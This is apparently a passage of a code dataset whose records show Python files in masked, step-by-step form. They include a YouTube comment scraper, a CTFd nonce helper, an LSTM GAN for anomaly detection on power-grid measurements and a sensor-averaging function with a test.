get_data(YOUTUBE_API_KEY, id_video, maxResults=\n maxResults, nextPageToken=nextPageToken)\n comment = list(get_text_of_comment(data))\n comments_all.append(comment)\n except:\n continue\n comments = sum(comments_all, [])\n return comments\n",
"step-3": "<mask token>\n\n\ndef get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):\n \"\"\"\n Получение информации со страницы с видео по video id\n \"\"\"\n YOUTUBE_URI = (\n 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&'\n +\n 'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'\n )\n format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY, videoId=\n videoId, maxResults=maxResults, nextPageToken=nextPageToken)\n content = requests.get(format_youtube_uri).text\n data = json.loads(content)\n return data\n\n\ndef get_text_of_comment(data):\n \"\"\"\n Получение комментариев из полученных данных под одним видео\n \"\"\"\n comms = set()\n for item in data['items']:\n comm = item['snippet']['topLevelComment']['snippet']['textDisplay']\n comms.add(comm)\n return comms\n\n\ndef get_all_comments(YOUTUBE_API_KEY, query, count_video=10, limit=30,\n maxResults=10, nextPageToken=''):\n \"\"\"\n Выгрузка maxResults комментариев\n \"\"\"\n api = Api(api_key=YOUTUBE_API_KEY)\n video_by_keywords = api.search_by_keywords(q=query, search_type=[\n 'video'], count=count_video, limit=limit)\n videoId = [x.id.videoId for x in video_by_keywords.items]\n comments_all = []\n for id_video in videoId:\n try:\n data = get_data(YOUTUBE_API_KEY, id_video, maxResults=\n maxResults, nextPageToken=nextPageToken)\n comment = list(get_text_of_comment(data))\n comments_all.append(comment)\n except:\n continue\n comments = sum(comments_all, [])\n return comments\n",
"step-4": "import json\nimport requests\nfrom pyyoutube import Api\n\n\ndef get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):\n \"\"\"\n Получение информации со страницы с видео по video id\n \"\"\"\n YOUTUBE_URI = (\n 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&'\n +\n 'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'\n )\n format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY, videoId=\n videoId, maxResults=maxResults, nextPageToken=nextPageToken)\n content = requests.get(format_youtube_uri).text\n data = json.loads(content)\n return data\n\n\ndef get_text_of_comment(data):\n \"\"\"\n Получение комментариев из полученных данных под одним видео\n \"\"\"\n comms = set()\n for item in data['items']:\n comm = item['snippet']['topLevelComment']['snippet']['textDisplay']\n comms.add(comm)\n return comms\n\n\ndef get_all_comments(YOUTUBE_API_KEY, query, count_video=10, limit=30,\n maxResults=10, nextPageToken=''):\n \"\"\"\n Выгрузка maxResults комментариев\n \"\"\"\n api = Api(api_key=YOUTUBE_API_KEY)\n video_by_keywords = api.search_by_keywords(q=query, search_type=[\n 'video'], count=count_video, limit=limit)\n videoId = [x.id.videoId for x in video_by_keywords.items]\n comments_all = []\n for id_video in videoId:\n try:\n data = get_data(YOUTUBE_API_KEY, id_video, maxResults=\n maxResults, nextPageToken=nextPageToken)\n comment = list(get_text_of_comment(data))\n comments_all.append(comment)\n except:\n continue\n comments = sum(comments_all, [])\n return comments\n",
"step-5": "import json\n\nimport requests\nfrom pyyoutube import Api\n\n\ndef get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):\n \"\"\"\n Получение информации со страницы с видео по video id\n \"\"\"\n YOUTUBE_URI = 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&' + \\\n 'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'\n format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY,\n videoId=videoId,\n maxResults=maxResults,\n nextPageToken=nextPageToken)\n content = requests.get(format_youtube_uri).text\n data = json.loads(content)\n return data\n\n\ndef get_text_of_comment(data):\n \"\"\"\n Получение комментариев из полученных данных под одним видео\n \"\"\"\n comms = set()\n for item in data['items']:\n comm = item['snippet']['topLevelComment']['snippet']['textDisplay']\n comms.add(comm)\n return comms\n\n\ndef get_all_comments(YOUTUBE_API_KEY, query, count_video=10, limit=30, maxResults=10, nextPageToken=''):\n \"\"\"\n Выгрузка maxResults комментариев\n \"\"\"\n api = Api(api_key=YOUTUBE_API_KEY)\n video_by_keywords = api.search_by_keywords(q=query,\n search_type=[\"video\"],\n count=count_video,\n limit=limit)\n videoId = [x.id.videoId for x in video_by_keywords.items]\n\n comments_all = []\n for id_video in videoId:\n try:\n data = get_data(YOUTUBE_API_KEY,\n id_video,\n maxResults=maxResults,\n nextPageToken=nextPageToken)\n comment = list(get_text_of_comment(data))\n comments_all.append(comment)\n except:\n continue\n comments = sum(comments_all, [])\n return comments\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from codecool_class import CodecoolClass
from mentor import Mentor
from student import Student
codecool_bp = CodecoolClass.create_local
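# Note: as written, this binds the create_local attribute itself rather than
# calling it; if the intent is to build an instance it would likely need to be
# invoked, e.g. codecool_bp = CodecoolClass.create_local(). It is left
# unchanged here because the CodecoolClass API is not shown in this record.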
|
normal
|
{
"blob_id": "7e985f55271c8b588abe54a07d20b89b2a29ff0d",
"index": 8380,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncodecool_bp = CodecoolClass.create_local\n",
"step-3": "from codecool_class import CodecoolClass\nfrom mentor import Mentor\nfrom student import Student\ncodecool_bp = CodecoolClass.create_local\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import os
from CTFd.utils.encoding import hexencode
def generate_nonce():
return hexencode(os.urandom(32))
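
# Note: usage sketch, assuming CTFd's hexencode returns a hex string (so the
# nonce is 64 hexadecimal characters for the 32 random bytes):
#     nonce = generate_nonce()
#     assert len(nonce) == 64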
|
normal
|
{
"blob_id": "4f91c57ad42759654a87328d5c92de8da14ca5ea",
"index": 2966,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_nonce():\n return hexencode(os.urandom(32))\n",
"step-3": "import os\nfrom CTFd.utils.encoding import hexencode\n\n\ndef generate_nonce():\n return hexencode(os.urandom(32))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# %matplotlib inline  (IPython magic; valid only in a notebook/IPython cell, commented out so the file parses as plain Python)
import os
#os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
import keras
from keras.layers import Dense, Dropout, Input, Embedding, LSTM, Reshape, CuDNNLSTM
from keras.models import Model,Sequential
from keras.datasets import mnist
from tqdm import tqdm
from keras.layers.advanced_activations import LeakyReLU
from keras.activations import relu
from keras.optimizers import adam
import numpy as np
import tensorflow as tf
import random
import pickle as pkl
import operator
import math
from sklearn import preprocessing
from keras.models import load_model
import time
from scipy.stats import norm
from scipy.io import loadmat
from natsort import natsorted
from scipy import stats
from seaborn import heatmap
import loading_data
from loading_data import load_train_vitheta_data_1225,load_real_data, load_standardized_data,load_train_data,load_train_data_V,load_train_vitheta_data_V,load_data_with_features,load_standardized_data_with_features
#%%
#%%
# =============================================================================
# =============================================================================
# # save data with V I and theta for 1225
# =============================================================================
# =============================================================================
filename='Raw_data/1225/data'
#os.listdir(filename)
#
pkl_file = open(filename, 'rb')
selected_data = pkl.load(pkl_file)
pkl_file.close()
cosin={}
# Reacive={}
# keys={}
# pf={}
cosin['TA']=np.cos((selected_data['L1ANG']-selected_data['C1ANG'])*(np.pi/180))
cosin['TB']=np.cos((selected_data['L2ANG']-selected_data['C2ANG'])*(np.pi/180))
cosin['TC']=np.cos((selected_data['L3ANG']-selected_data['C3ANG'])*(np.pi/180))
# Reacive['A']=selected_data['L1Mag']*selected_data['C1Mag']*(np.sin((selected_data['L1Ang']-selected_data['C1Ang'])*(np.pi/180)))
# Reacive['B']=selected_data['L2Mag']*selected_data['C2Mag']*(np.sin((selected_data['L2Ang']-selected_data['C2Ang'])*(np.pi/180)))
# Reacive['C']=selected_data['L3Mag']*selected_data['C3Mag']*(np.sin((selected_data['L3Ang']-selected_data['C3Ang'])*(np.pi/180)))
#
#pf['A']=Active['A']/np.sqrt(np.square(Active['A'])+np.square(Reacive['A']))
#pf['B']=Active['B']/np.sqrt(np.square(Active['B'])+np.square(Reacive['B']))
#pf['C']=Active['C']/np.sqrt(np.square(Active['C'])+np.square(Reacive['C']))
selected_data['TA']=cosin['TA']
selected_data['TB']=cosin['TB']
selected_data['TC']=cosin['TC']
k=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']
day_data={}
for key in k:
day_data[key]=selected_data[key]
dir='Raw_data/1225/VIT.pkl'
output = open(dir, 'wb')
pkl.dump(day_data, output)
output.close()
#%%
# =============================================================================
# =============================================================================
# # train data prepreation
# =============================================================================
# =============================================================================
#start,SampleNum,N=(0,40,500000)
#filename='Raw_data/1225/VIT.pkl'
#k=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']
##%%
#dds=load_standardized_data_with_features(filename,k)
##%%
#dd=load_data_with_features(filename,k)
#%%
# =============================================================================
# =============================================================================
# # real data for 1225 VIT
# =============================================================================
# =============================================================================
filename='Raw_data/1225/VIT.pkl'
pkl_file = open(filename, 'rb')
selected_data_1225_normal = pkl.load(pkl_file)
pkl_file.close()
#%%
# =============================================================================
# =============================================================================
# # data without key
# =============================================================================
# =============================================================================
selected_data_1225=[]
for f in k:
selected_data_1225.append(selected_data_1225_normal[f])
#%%
start,SampleNum,N=(0,40,500000)
filename='Raw_data/1225/VIT.pkl'
k=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']
tt=load_train_vitheta_data_1225(start,SampleNum,N,filename,k)
#%%
X_train = tt
scores={}
probability_mean={}
anomalies={}
kkk=k[0:1]
for idx,key in enumerate(kkk):
print(key)
X_train_temp=X_train[:,idx]
#X_train.reshape(N,3*SampleNum)
X_train_temp=X_train_temp.reshape(N,SampleNum,1)
id=int(np.floor(idx/3))
mode=k[id*3]
# dis_name='dis_sep_onelearn_'+mode+'.h5'
# print(dis_name)
#
# discriminator=load_model(dis_name)
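    # Note: this scoring cell references `discriminator` before any model is
    # defined in this file; it assumes either that the commented load_model(...)
    # lines above are enabled (loading a previously trained discriminator) or
    # that the GAN training cells further down have already been run in the
    # same session.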
rate=1000
shift=N/rate
scores[key]=[]
for i in range(rate-1):
temp=discriminator.predict_on_batch(X_train_temp[int(i*shift):int((i+1)*shift)])
scores[key].append(temp)
# print(i)
scores[key]=np.array(scores[key])
scores[key]=scores[key].ravel()
probability_mean[key]=np.mean(scores[key])
data=scores[key]-probability_mean[key]
mu, std = norm.fit(data)
zp=3
high=mu+zp*std
low=mu-zp*std
anomalies[key]=np.union1d(np.where(data>=high)[0], np.where(data<=low)[0])
print(anomalies[key].shape)
#%%
# =============================================================================
# =============================================================================
# # plot 1225
# =============================================================================
# =============================================================================
def show_1225(events):
SampleNum=40
for anom in events:
anom=int(anom)
print(anom)
plt.subplot(221)
for i in [0,1,2]:
plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])
plt.legend('A' 'B' 'C')
plt.title('V')
plt.subplot(222)
for i in [3,4,5]:
plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])
plt.legend('A' 'B' 'C')
plt.title('I')
plt.subplot(223)
for i in [6,7,8]:
plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])
plt.legend('A' 'B' 'C')
plt.title('T')
plt.show()
#%%
X_train = tt
#%%
def adam_optimizer():
return adam(lr=0.0002, beta_1=0.5)
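# Note: adam(lr=...) targets the old multi-backend Keras API; on current
# tf.keras the equivalent sketch would be (lr renamed to learning_rate):
#     from tensorflow.keras.optimizers import Adam
#     def adam_optimizer():
#         return Adam(learning_rate=0.0002, beta_1=0.5)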
#%%
def create_generator():
generator=Sequential()
generator.add(CuDNNLSTM(units=256,input_shape=(100,1),return_sequences=True))
generator.add(LeakyReLU(0.2))
generator.add(CuDNNLSTM(units=512))
generator.add(LeakyReLU(0.2))
generator.add(Dense(units=512))
generator.add(LeakyReLU(0.2))
#
# generator.add(LSTM(units=1024))
# generator.add(LeakyReLU(0.2))
generator.add(Dense(units=1*40))
generator.compile(loss='binary_crossentropy', optimizer=adam_optimizer())
return generator
g=create_generator()
g.summary()
#%%
def create_discriminator():
discriminator=Sequential()
discriminator.add(CuDNNLSTM(units=256,input_shape=(40,1),return_sequences=True))
discriminator.add(LeakyReLU(0.2))
# discriminator.add(Dropout(0.3))
discriminator.add(CuDNNLSTM(units=512))
discriminator.add(LeakyReLU(0.2))
#
discriminator.add(Dense(units=512))
discriminator.add(LeakyReLU(0.2))
# discriminator.add(Dropout(0.3))
#
# discriminator.add(LSTM(units=256))
# discriminator.add(LeakyReLU(0.2))
discriminator.add(Dense(units=1, activation='sigmoid'))
discriminator.compile(loss='binary_crossentropy', optimizer=adam_optimizer())
return discriminator
d =create_discriminator()
d.summary()
#%%
def create_gan(discriminator, generator):
discriminator.trainable=False
gan_input = Input(shape=(100,1))
x = generator(gan_input)
x = Reshape((40,1), input_shape=(1*40,1))(x)
gan_output= discriminator(x)
gan= Model(inputs=gan_input, outputs=gan_output)
gan.compile(loss='binary_crossentropy', optimizer='adam')
return gan
gan = create_gan(d,g)
gan.summary()
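# Note: setting discriminator.trainable = False inside create_gan() freezes the
# discriminator weights only within the combined `gan` model, because Keras
# captures the trainable flag at compile time; the separately compiled
# discriminator is still updated by train_on_batch in training() further down,
# which is the standard GAN training pattern.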
#%%
batch_size=5
epochnum=2
#%%
start,SampleNum,N=(0,40,500000)
#X_train = load_data(start,SampleNum,N)
#filename=
X_train = tt
batch_count = X_train.shape[0] / batch_size
##%%
#X_train=X_train.reshape(N,3*SampleNum)
#X_train=X_train.reshape(N,SampleNum,3)
#%%
rnd={}
for i in range(epochnum):
rnd[i]=np.random.randint(low=0,high=N,size=batch_size)
# show(rnd[i])
#%%
generator= create_generator()
discriminator= create_discriminator()
gan = create_gan(discriminator, generator)
#%%
all_scores=[]
def training(generator,discriminator,gan,epochs, batch_size,all_scores):
# all_scores=[]
scale=1
for e in range(1,epochs+1 ):
all_score_temp=[]
tik=time.clock()
print("Epoch %d" %e)
for _ in tqdm(range(batch_size)):
#generate random noise as an input to initialize the generator
noise= scale*np.random.normal(0,1, [batch_size, 100])
noise=noise.reshape(batch_size,100,1)
# Generate fake MNIST images from noised input
generated_images = generator.predict(noise)
generated_images = generated_images.reshape(batch_size,SampleNum,1)
# print(generated_images.shape)
# Get a random set of real images
# random.seed(0)
image_batch =X_train_temp[rnd[e-1]]
# print(image_batch.shape)
#Construct different batches of real and fake data
X= np.concatenate([image_batch, generated_images])
# Labels for generated and real data
y_dis=np.zeros(2*batch_size)
y_dis[:batch_size]=0.9
#Pre train discriminator on fake and real data before starting the gan.
discriminator.trainable=True
discriminator.train_on_batch(X, y_dis)
#Tricking the noised input of the Generator as real data
noise= scale*np.random.normal(0,1, [batch_size, 100])
noise=noise.reshape(batch_size,100,1)
y_gen = np.ones(batch_size)
# During the training of gan,
# the weights of discriminator should be fixed.
#We can enforce that by setting the trainable flag
discriminator.trainable=False
#training the GAN by alternating the training of the Discriminator
            #and training the chained GAN model with the Discriminator's weights frozen.
gan.train_on_batch(noise, y_gen)
rate=1000
shift=N/rate
all_score_temp=[]
for i in range(rate-1):
temp=discriminator.predict_on_batch(X_train_temp[int(i*shift):int((i+1)*shift)])
all_score_temp.append(temp)
# print(i)
all_score_temp=np.array(all_score_temp)
all_score_temp=all_score_temp.ravel()
all_scores.append(all_score_temp)
toc = time.clock()
print(toc-tik)
#%%
kk=['L1MAG']
for idx,key in enumerate(kk):
X_train_temp=X_train[:,(idx)]
#X_train.reshape(N,3*SampleNum)
X_train_temp=X_train_temp.reshape(N,SampleNum,1)
tic = time.clock()
training(generator,discriminator,gan,epochnum,batch_size,all_scores)
toc = time.clock()
print(toc-tic)
#
# gan_name='gan_sep_onelearn_good_09_'+key+'.h5'
# gen_name='gen_sep_onelearn_good_09_'+key+'.h5'
# dis_name='dis_sep_onelearn_good_09_'+key+'.h5'
# print(dis_name)
# gan.save(gan_name)
# generator.save(gen_name)
# discriminator.save(dis_name)
|
normal
|
{
"blob_id": "bb335187dc61fae049ca4a9a55a93f856b3c7822",
"index": 2534,
"step-1": "# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n%matplotlib inline\nimport os\n#os.environ['CUDA_VISIBLE_DEVICES'] = '-1'\nimport keras\nfrom keras.layers import Dense, Dropout, Input, Embedding, LSTM, Reshape, CuDNNLSTM\nfrom keras.models import Model,Sequential\nfrom keras.datasets import mnist\nfrom tqdm import tqdm\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.activations import relu\nfrom keras.optimizers import adam\nimport numpy as np\nimport tensorflow as tf\nimport random\nimport pickle as pkl\nimport operator\nimport math\nfrom sklearn import preprocessing\nfrom keras.models import load_model\nimport time\nfrom scipy.stats import norm\nfrom scipy.io import loadmat\nfrom natsort import natsorted\nfrom scipy import stats\nfrom seaborn import heatmap\n\nimport loading_data\nfrom loading_data import load_train_vitheta_data_1225,load_real_data, load_standardized_data,load_train_data,load_train_data_V,load_train_vitheta_data_V,load_data_with_features,load_standardized_data_with_features\n\n\n#%%\n \n#%%\n# =============================================================================\n# =============================================================================\n# # save data with V I and theta for 1225\n# =============================================================================\n# =============================================================================\nfilename='Raw_data/1225/data'\n#os.listdir(filename)\n#\npkl_file = open(filename, 'rb')\nselected_data = pkl.load(pkl_file)\npkl_file.close()\ncosin={}\n# Reacive={}\n# keys={}\n# pf={}\n\n \ncosin['TA']=np.cos((selected_data['L1ANG']-selected_data['C1ANG'])*(np.pi/180))\ncosin['TB']=np.cos((selected_data['L2ANG']-selected_data['C2ANG'])*(np.pi/180))\ncosin['TC']=np.cos((selected_data['L3ANG']-selected_data['C3ANG'])*(np.pi/180))\n \n # Reacive['A']=selected_data['L1Mag']*selected_data['C1Mag']*(np.sin((selected_data['L1Ang']-selected_data['C1Ang'])*(np.pi/180)))\n # Reacive['B']=selected_data['L2Mag']*selected_data['C2Mag']*(np.sin((selected_data['L2Ang']-selected_data['C2Ang'])*(np.pi/180)))\n # Reacive['C']=selected_data['L3Mag']*selected_data['C3Mag']*(np.sin((selected_data['L3Ang']-selected_data['C3Ang'])*(np.pi/180)))\n # \n #pf['A']=Active['A']/np.sqrt(np.square(Active['A'])+np.square(Reacive['A']))\n #pf['B']=Active['B']/np.sqrt(np.square(Active['B'])+np.square(Reacive['B']))\n #pf['C']=Active['C']/np.sqrt(np.square(Active['C'])+np.square(Reacive['C']))\n \n \nselected_data['TA']=cosin['TA']\nselected_data['TB']=cosin['TB']\nselected_data['TC']=cosin['TC']\n \nk=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']\nday_data={}\nfor key in k:\n day_data[key]=selected_data[key]\n \n\ndir='Raw_data/1225/VIT.pkl'\noutput = open(dir, 'wb')\npkl.dump(day_data, output)\noutput.close()\n\n#%%\n\n\n# =============================================================================\n# =============================================================================\n# # train data prepreation\n# =============================================================================\n# =============================================================================\n#start,SampleNum,N=(0,40,500000)\n#filename='Raw_data/1225/VIT.pkl'\n#k=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']\n##%%\n#dds=load_standardized_data_with_features(filename,k)\n##%%\n#dd=load_data_with_features(filename,k)\n#%%\n# 
=============================================================================\n# =============================================================================\n# # real data for 1225 VIT\n# =============================================================================\n# =============================================================================\nfilename='Raw_data/1225/VIT.pkl'\npkl_file = open(filename, 'rb')\nselected_data_1225_normal = pkl.load(pkl_file)\npkl_file.close()\n#%%\n# =============================================================================\n# =============================================================================\n# # data without key\n# =============================================================================\n# =============================================================================\nselected_data_1225=[]\nfor f in k:\n selected_data_1225.append(selected_data_1225_normal[f])\n#%%\nstart,SampleNum,N=(0,40,500000)\nfilename='Raw_data/1225/VIT.pkl'\nk=['L1MAG','L2MAG', 'L3MAG','C1MAG','C2MAG', 'C3MAG','TA', 'TB', 'TC']\ntt=load_train_vitheta_data_1225(start,SampleNum,N,filename,k)\n#%%\nX_train = tt\nscores={}\nprobability_mean={}\nanomalies={}\nkkk=k[0:1]\nfor idx,key in enumerate(kkk):\n print(key)\n X_train_temp=X_train[:,idx]\n#X_train.reshape(N,3*SampleNum)\n X_train_temp=X_train_temp.reshape(N,SampleNum,1)\n\n id=int(np.floor(idx/3))\n mode=k[id*3]\n# dis_name='dis_sep_onelearn_'+mode+'.h5'\n# print(dis_name)\n# \n# discriminator=load_model(dis_name)\n \n \n rate=1000\n shift=N/rate\n scores[key]=[]\n for i in range(rate-1):\n temp=discriminator.predict_on_batch(X_train_temp[int(i*shift):int((i+1)*shift)])\n scores[key].append(temp)\n# print(i)\n \n scores[key]=np.array(scores[key])\n scores[key]=scores[key].ravel()\n \n probability_mean[key]=np.mean(scores[key])\n data=scores[key]-probability_mean[key]\n \n mu, std = norm.fit(data)\n \n zp=3\n \n high=mu+zp*std\n low=mu-zp*std\n \n anomalies[key]=np.union1d(np.where(data>=high)[0], np.where(data<=low)[0])\n print(anomalies[key].shape)\n \n#%%\n# =============================================================================\n# =============================================================================\n# # plot 1225\n# =============================================================================\n# =============================================================================\n\ndef show_1225(events):\n SampleNum=40\n for anom in events:\n anom=int(anom)\n print(anom)\n \n plt.subplot(221)\n for i in [0,1,2]:\n plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])\n plt.legend('A' 'B' 'C')\n plt.title('V')\n \n plt.subplot(222)\n for i in [3,4,5]:\n plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])\n plt.legend('A' 'B' 'C')\n plt.title('I') \n \n plt.subplot(223)\n for i in [6,7,8]:\n plt.plot(selected_data_1225[i][anom*int(SampleNum/2)-240:(anom*int(SampleNum/2)+240)])\n plt.legend('A' 'B' 'C') \n plt.title('T') \n plt.show() \n#%%\nX_train = tt\n #%%\ndef adam_optimizer():\n return adam(lr=0.0002, beta_1=0.5)\n#%%\ndef create_generator():\n generator=Sequential()\n generator.add(CuDNNLSTM(units=256,input_shape=(100,1),return_sequences=True))\n generator.add(LeakyReLU(0.2))\n \n generator.add(CuDNNLSTM(units=512))\n generator.add(LeakyReLU(0.2))\n \n generator.add(Dense(units=512))\n generator.add(LeakyReLU(0.2))\n# \n# generator.add(LSTM(units=1024))\n# generator.add(LeakyReLU(0.2))\n \n generator.add(Dense(units=1*40))\n \n 
generator.compile(loss='binary_crossentropy', optimizer=adam_optimizer())\n return generator\ng=create_generator()\ng.summary()\n\n#%%\ndef create_discriminator():\n discriminator=Sequential()\n discriminator.add(CuDNNLSTM(units=256,input_shape=(40,1),return_sequences=True))\n discriminator.add(LeakyReLU(0.2))\n# discriminator.add(Dropout(0.3))\n discriminator.add(CuDNNLSTM(units=512))\n discriminator.add(LeakyReLU(0.2))\n# \n discriminator.add(Dense(units=512))\n discriminator.add(LeakyReLU(0.2))\n# discriminator.add(Dropout(0.3))\n# \n# discriminator.add(LSTM(units=256))\n# discriminator.add(LeakyReLU(0.2))\n \n discriminator.add(Dense(units=1, activation='sigmoid'))\n \n discriminator.compile(loss='binary_crossentropy', optimizer=adam_optimizer())\n return discriminator\nd =create_discriminator()\nd.summary()\n#%%\ndef create_gan(discriminator, generator):\n discriminator.trainable=False\n gan_input = Input(shape=(100,1))\n x = generator(gan_input)\n x = Reshape((40,1), input_shape=(1*40,1))(x)\n gan_output= discriminator(x)\n gan= Model(inputs=gan_input, outputs=gan_output)\n gan.compile(loss='binary_crossentropy', optimizer='adam')\n return gan\ngan = create_gan(d,g)\ngan.summary()\n\n#%%\nbatch_size=5\nepochnum=2\n\n\n#%%\n\nstart,SampleNum,N=(0,40,500000)\n#X_train = load_data(start,SampleNum,N)\n#filename=\nX_train = tt\nbatch_count = X_train.shape[0] / batch_size\n##%%\n#X_train=X_train.reshape(N,3*SampleNum)\n#X_train=X_train.reshape(N,SampleNum,3)\n#%%\nrnd={}\nfor i in range(epochnum):\n rnd[i]=np.random.randint(low=0,high=N,size=batch_size)\n# show(rnd[i])\n \n\n#%%\ngenerator= create_generator()\ndiscriminator= create_discriminator()\ngan = create_gan(discriminator, generator)\n\n#%%\nall_scores=[]\ndef training(generator,discriminator,gan,epochs, batch_size,all_scores):\n# all_scores=[]\n scale=1\n for e in range(1,epochs+1 ):\n all_score_temp=[]\n tik=time.clock()\n print(\"Epoch %d\" %e)\n for _ in tqdm(range(batch_size)):\n #generate random noise as an input to initialize the generator\n noise= scale*np.random.normal(0,1, [batch_size, 100])\n noise=noise.reshape(batch_size,100,1)\n # Generate fake MNIST images from noised input\n generated_images = generator.predict(noise)\n generated_images = generated_images.reshape(batch_size,SampleNum,1)\n# print(generated_images.shape)\n # Get a random set of real images\n# random.seed(0)\n image_batch =X_train_temp[rnd[e-1]]\n# print(image_batch.shape)\n #Construct different batches of real and fake data \n X= np.concatenate([image_batch, generated_images])\n \n # Labels for generated and real data\n y_dis=np.zeros(2*batch_size)\n y_dis[:batch_size]=0.9\n \n #Pre train discriminator on fake and real data before starting the gan. \n discriminator.trainable=True\n discriminator.train_on_batch(X, y_dis)\n \n #Tricking the noised input of the Generator as real data\n noise= scale*np.random.normal(0,1, [batch_size, 100])\n noise=noise.reshape(batch_size,100,1)\n y_gen = np.ones(batch_size)\n \n # During the training of gan, \n # the weights of discriminator should be fixed. 
\n #We can enforce that by setting the trainable flag\n discriminator.trainable=False\n \n #training the GAN by alternating the training of the Discriminator \n #and training the chained GAN model with Discriminator’s weights freezed.\n gan.train_on_batch(noise, y_gen)\n \n rate=1000\n shift=N/rate\n all_score_temp=[]\n for i in range(rate-1):\n temp=discriminator.predict_on_batch(X_train_temp[int(i*shift):int((i+1)*shift)])\n all_score_temp.append(temp)\n # print(i)\n all_score_temp=np.array(all_score_temp)\n all_score_temp=all_score_temp.ravel()\n all_scores.append(all_score_temp)\n toc = time.clock()\n print(toc-tik)\n \n\n#%%\nkk=['L1MAG']\nfor idx,key in enumerate(kk):\n X_train_temp=X_train[:,(idx)]\n#X_train.reshape(N,3*SampleNum)\n X_train_temp=X_train_temp.reshape(N,SampleNum,1)\n tic = time.clock() \n training(generator,discriminator,gan,epochnum,batch_size,all_scores)\n toc = time.clock()\n print(toc-tic)\n# \n# gan_name='gan_sep_onelearn_good_09_'+key+'.h5'\n# gen_name='gen_sep_onelearn_good_09_'+key+'.h5'\n# dis_name='dis_sep_onelearn_good_09_'+key+'.h5'\n# print(dis_name)\n# gan.save(gan_name)\n# generator.save(gen_name)\n# discriminator.save(dis_name)\n\n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
def twoSensorAvg(input_data, duration=1):
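    # Note: each record appears to be "sensor_id,timestamp_ms,value" (see the
    # sample input under __main__); readings from all sensors are pooled into
    # `duration`-second buckets and averaged per bucket.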
times = {}
for i in input_data:
data = i.split(',')
time = int(int(data[1]) / (duration * 1000))
if time not in times:
times[time] = [0, 0]
times[time][0] += int(data[2])
times[time][1] += 1
ans = []
for i, v in times.items():
i = int(i)
a = str(i * duration * 1000) + '-' + str(i * duration * 1000 + 1000 *
(duration - 1) + 999) + ': ' + str(round(float(v[0] / v[1]), 2))
ans.append(a)
return ans
def test(input, output, duration):
results = twoSensorAvg(input, duration)
print(results)
if len(results) != len(output):
return False
for i in range(len(output)):
if results[i] != output[i]:
return False
return True
if __name__ == '__main__':
input_data = ['1,10000,40', '1,10002,45', '1,11015,50', '2,10005,42',
'2,11051,45', '2,12064,42', '2,13161,42']
ans = ['10000-10999: 42.33', '11000-11999: 47.5', '12000-12999: 42.0',
'13000-13999: 42.0']
print(test(input_data, ans, 1))
|
normal
|
{
"blob_id": "836d712c811079f190eae9c2780131a844c9dddf",
"index": 3044,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test(input, output, duration):\n results = twoSensorAvg(input, duration)\n print(results)\n if len(results) != len(output):\n return False\n for i in range(len(output)):\n if results[i] != output[i]:\n return False\n return True\n\n\n<mask token>\n",
"step-3": "def twoSensorAvg(input_data, duration=1):\n times = {}\n for i in input_data:\n data = i.split(',')\n time = int(int(data[1]) / (duration * 1000))\n if time not in times:\n times[time] = [0, 0]\n times[time][0] += int(data[2])\n times[time][1] += 1\n ans = []\n for i, v in times.items():\n i = int(i)\n a = str(i * duration * 1000) + '-' + str(i * duration * 1000 + 1000 *\n (duration - 1) + 999) + ': ' + str(round(float(v[0] / v[1]), 2))\n ans.append(a)\n return ans\n\n\ndef test(input, output, duration):\n results = twoSensorAvg(input, duration)\n print(results)\n if len(results) != len(output):\n return False\n for i in range(len(output)):\n if results[i] != output[i]:\n return False\n return True\n\n\n<mask token>\n",
